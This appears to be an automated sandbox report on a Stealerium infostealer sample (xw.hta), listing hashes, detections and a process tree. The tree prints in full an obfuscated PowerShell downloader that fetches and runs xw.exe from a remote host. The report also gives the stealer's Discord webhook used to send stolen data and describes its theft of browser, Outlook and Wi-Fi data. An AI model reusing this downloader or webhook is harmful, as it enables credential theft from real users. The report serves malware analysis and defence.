Overview
overview
10Static
static
3magic.pois...lk.dat
windows10-2004-x64
3magic.pois...ed.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...cs.hta
windows10-2004-x64
10magic.pois...nt.pdf
windows10-2004-x64
1magic.pois...zg.wav
windows10-2004-x64
6magic.pois...pt.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...es.hta
windows10-2004-x64
10magic.pois...im.vdf
windows10-2004-x64
3magic.pois...ck.wav
windows10-2004-x64
1magic.pois...ff.dat
windows10-2004-x64
3magic.pois...IB.pdf
windows10-2004-x64
1magic.pois...pt.exe
windows10-2004-x64
10magic.pois...ty.wav
windows10-2004-x64
1magic.pois...ye.wav
windows10-2004-x64
6magic.pois...er.exe
windows10-2004-x64
10magic.pois...vw.mp4
windows10-2004-x64
6magic.pois...op.mp4
windows10-2004-x64
6magic.pois...ed.hta
windows10-2004-x64
10magic.pois...ng.exe
windows10-2004-x64
10magic.pois...wn.png
windows10-2004-x64
3magic.pois...ox.hta
windows10-2004-x64
10magic.pois...xw.exe
windows10-2004-x64
10magic.pois...xw.hta
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
magic.poisontoolz.com/Avjteuhlk.dat
Resource
win10v2004-20231215-en
Behavioral task
behavioral2
Sample
magic.poisontoolz.com/Binded.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
magic.poisontoolz.com/Buildcrypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
magic.poisontoolz.com/Docs.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
magic.poisontoolz.com/Document.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral6
Sample
magic.poisontoolz.com/Evllmzg.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
magic.poisontoolz.com/File1crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral8
Sample
magic.poisontoolz.com/File2crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
magic.poisontoolz.com/Files.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral10
Sample
magic.poisontoolz.com/Jafxaspdhim.vdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
magic.poisontoolz.com/Otcck.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral12
Sample
magic.poisontoolz.com/Pphucxdmff.dat
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
magic.poisontoolz.com/RIB.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral14
Sample
magic.poisontoolz.com/RagCrypt.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral15
Sample
magic.poisontoolz.com/Spaufgty.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral16
Sample
magic.poisontoolz.com/Utsxokye.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
magic.poisontoolz.com/Walter.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral18
Sample
magic.poisontoolz.com/Wjwxkhbvw.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
magic.poisontoolz.com/Wlkubkwdmop.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral20
Sample
magic.poisontoolz.com/binded.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
magic.poisontoolz.com/building.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral22
Sample
magic.poisontoolz.com/down.png
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
magic.poisontoolz.com/fox.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral24
Sample
magic.poisontoolz.com/xw.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
magic.poisontoolz.com/xw.hta
Resource
win10v2004-20231215-en
General
-
Target
magic.poisontoolz.com/xw.hta
-
Size
9KB
-
MD5
7fd67141143ee183f9fddde7fc7e02de
-
SHA1
bb658b3ec2437bd8ec9600e726433139aae85e3d
-
SHA256
f29e50d354f1449c3cfc01c31f14268a29ef70051041bc14b6b71b94bce5b517
-
SHA512
baded976e98ea76b9813128dc1947abae8c915fdeeb6619dff2bc88efcb31e1ee291494faa2405caa283ba6268101622932b569be02e0172b4c4a69481375ae5
-
SSDEEP
192:uIBkEA+PkPeI19n1dNDQ9nNNsV2OilDQ9nysHSUlDvdltdEVqQKdDp4Re1JQ/ffs:u20oc1C+nQrzk
Malware Config
Extracted
stealerium
https://discordapp.com/api/webhooks/1197850806213431377/-zU9uA2NeaYEk4-ozdhgmNljI6NS_w_qcT_cbtxYxZdkUD3JeaKChZp4GXdod-MX3D1Q
Signatures
-
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral25/memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-44-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-45-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-47-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-49-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-51-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-53-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-55-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-57-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-59-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-61-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-65-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-63-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-67-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-69-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-71-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-73-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-75-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-77-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-79-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-81-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-83-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-85-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-87-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-89-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-91-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-93-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-95-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-97-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-99-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-101-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-103-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-105-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 behavioral25/memory/1012-107-0x0000000008140000-0x00000000086A3000-memory.dmp family_zgrat_v1 -
Stealerium
An open source info stealer written in C# first seen in May 2022.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 4284 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exexw.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation xw.exe -
Drops startup file 2 IoCs
Processes:
loaderX.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe loaderX.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe loaderX.exe -
Executes dropped EXE 6 IoCs
Processes:
xw.exexw.exexw.exexw.exeloaderX.exebuild.exepid process 1012 xw.exe 1756 xw.exe 2720 xw.exe 3080 xw.exe 3732 loaderX.exe 3144 build.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
build.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
xw.exedescription pid process target process PID 1012 set thread context of 3080 1012 xw.exe xw.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier build.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 build.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exexw.exebuild.exepid process 4284 powershell.exe 4284 powershell.exe 1012 xw.exe 1012 xw.exe 1012 xw.exe 1012 xw.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe 3144 build.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exexw.exeloaderX.exebuild.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4284 powershell.exe Token: SeDebugPrivilege 1012 xw.exe Token: SeDebugPrivilege 3732 loaderX.exe Token: SeDebugPrivilege 3144 build.exe Token: SeSecurityPrivilege 4040 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
build.exepid process 3144 build.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.exexw.exexw.exebuild.execmd.execmd.exedescription pid process target process PID 1988 wrote to memory of 4284 1988 mshta.exe powershell.exe PID 1988 wrote to memory of 4284 1988 mshta.exe powershell.exe PID 1988 wrote to memory of 4284 1988 mshta.exe powershell.exe PID 4284 wrote to memory of 1012 4284 powershell.exe xw.exe PID 4284 wrote to memory of 1012 4284 powershell.exe xw.exe PID 4284 wrote to memory of 1012 4284 powershell.exe xw.exe PID 1012 wrote to memory of 1756 1012 xw.exe xw.exe PID 1012 wrote to memory of 1756 1012 xw.exe xw.exe PID 1012 wrote to memory of 1756 1012 xw.exe xw.exe PID 1012 wrote to memory of 2720 1012 xw.exe xw.exe PID 1012 wrote to memory of 2720 1012 xw.exe xw.exe PID 1012 wrote to memory of 2720 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 1012 wrote to memory of 3080 1012 xw.exe xw.exe PID 3080 wrote to memory of 3732 3080 xw.exe loaderX.exe PID 3080 wrote to memory of 3732 3080 xw.exe loaderX.exe PID 3080 wrote to memory of 3144 3080 xw.exe build.exe PID 3080 wrote to memory of 3144 3080 xw.exe build.exe PID 3080 wrote to memory of 3144 3080 xw.exe build.exe PID 3144 wrote to memory of 1132 3144 build.exe cmd.exe PID 3144 wrote to memory of 1132 3144 build.exe cmd.exe PID 3144 wrote to memory of 1132 3144 build.exe cmd.exe PID 1132 wrote to memory of 4028 1132 cmd.exe chcp.com PID 1132 wrote to memory of 4028 1132 cmd.exe chcp.com PID 1132 wrote to memory of 4028 1132 cmd.exe chcp.com PID 1132 wrote to memory of 4780 1132 cmd.exe netsh.exe PID 1132 wrote to memory of 4780 1132 cmd.exe netsh.exe PID 1132 wrote to memory of 4780 1132 cmd.exe netsh.exe PID 1132 wrote to memory of 4936 1132 cmd.exe findstr.exe PID 1132 wrote to memory of 4936 1132 cmd.exe findstr.exe PID 1132 wrote to memory of 4936 1132 cmd.exe findstr.exe PID 3144 wrote to memory of 348 3144 build.exe cmd.exe PID 3144 wrote to memory of 348 3144 build.exe cmd.exe PID 3144 wrote to memory of 348 3144 build.exe cmd.exe PID 348 wrote to memory of 2812 348 cmd.exe chcp.com PID 348 wrote to memory of 2812 348 cmd.exe chcp.com PID 348 wrote to memory of 2812 348 cmd.exe chcp.com PID 348 wrote to memory of 4464 348 cmd.exe netsh.exe PID 348 wrote to memory of 4464 348 cmd.exe netsh.exe PID 348 wrote to memory of 4464 348 cmd.exe netsh.exe -
outlook_office_path 1 IoCs
Processes:
build.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
outlook_win_path 1 IoCs
Processes:
build.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Roaming\xw.exe"C:\Users\Admin\AppData\Roaming\xw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Users\Admin\AppData\Roaming\xw.exeC:\Users\Admin\AppData\Roaming\xw.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\loaderX.exe"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3144 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All6⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:4028
-
C:\Windows\SysWOW64\findstr.exefindstr All7⤵PID:4936
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile7⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid6⤵
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid7⤵PID:4464
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:2812
-
C:\Users\Admin\AppData\Roaming\xw.exeC:\Users\Admin\AppData\Roaming\xw.exe4⤵
- Executes dropped EXE
PID:2720 -
C:\Users\Admin\AppData\Roaming\xw.exeC:\Users\Admin\AppData\Roaming\xw.exe4⤵
- Executes dropped EXE
PID:1756
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
Filesize25B
MD5966247eb3ee749e21597d73c4176bd52
SHA11e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA2568ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa
-
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt
Filesize23B
MD51fddbf1169b6c75898b86e7e24bc7c1f
SHA1d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA51220bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d
-
Filesize
5KB
MD5b1d58554f33c991f9454f81bf1f6a7a6
SHA11a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA2562809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6
-
Filesize
1007B
MD5894a0706eaf89a7b68175d7da206a8b3
SHA150cb6c62493034303e4d35aef1e0c45d5dd2e102
SHA256ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18
SHA5121a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924
-
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt
Filesize4KB
MD5d162920ec27ea267235b5216d6701181
SHA1ef91540d216bead782f55da51239c2682dc7b71d
SHA256c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd
SHA5127e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4
-
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt
Filesize29B
MD571eb5479298c7afc6d126fa04d2a9bde
SHA1a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA5127c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd
-
Filesize
19B
MD50195e3cc8225740a42592efa8bf12f60
SHA1d4317e1f9762572ea061de3e2639f74cd2a941be
SHA2560aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db
SHA5128681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
234B
MD56be6fdca0cfa94635b8689b2b0bf2bee
SHA1379c61029b5443c3d3df7c770423e40618b36d15
SHA2565bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA5127955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8
-
Filesize
234B
MD5412ec159e4b14be1ca93db473e80acc2
SHA18909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
92KB
MD5a90e4f6bdd44a71e2246160693884539
SHA1940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA5129a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937
-
Filesize
33KB
MD5ce008446a6fa668f1482d5dbf86db7a5
SHA1e44d92971edbeb71bfd53e38b2d5dd31fe0dc216
SHA256b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d
SHA512980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d
-
Filesize
86KB
MD5d1aa9832a89fcef4fe32df07d43736c0
SHA175b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5
SHA256c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce
SHA512bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84
-
Filesize
92KB
MD545ea343e335d2d6400ccbc1e3fc85f11
SHA17f2267d1f27a076e284696c30a4cf4768fd1a52f
SHA256f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
SHA512c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1
-
Filesize
85KB
MD5dd87528a716d48530d8cc7fe6bec3386
SHA189351d5b60846912f216acb58219397fc1ca9aee
SHA256eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244
SHA5129f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861
-
Filesize
153KB
MD5f37938f3bb58f159e1d46403c6e0b10a
SHA178948994aa6c388b4356ee1eeb94b20cdfcda845
SHA256634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8
SHA5126345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5
-
Filesize
17KB
MD5eef7a52c4e6fc20cd22306b007b9b4c0
SHA1700f935a3e75a0001654fae0b4d30af5044329c0
SHA2561e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444
SHA5124459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70
-
Filesize
1KB
MD5e6ccb03a4cd3aa39359361eae696ab9b
SHA1ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3
SHA2567cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba
SHA5124e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd
-
Filesize
4KB
MD5041d958d503620fcee33aab200c8e17a
SHA16e6b21612723294622356d6897968faa05439b81
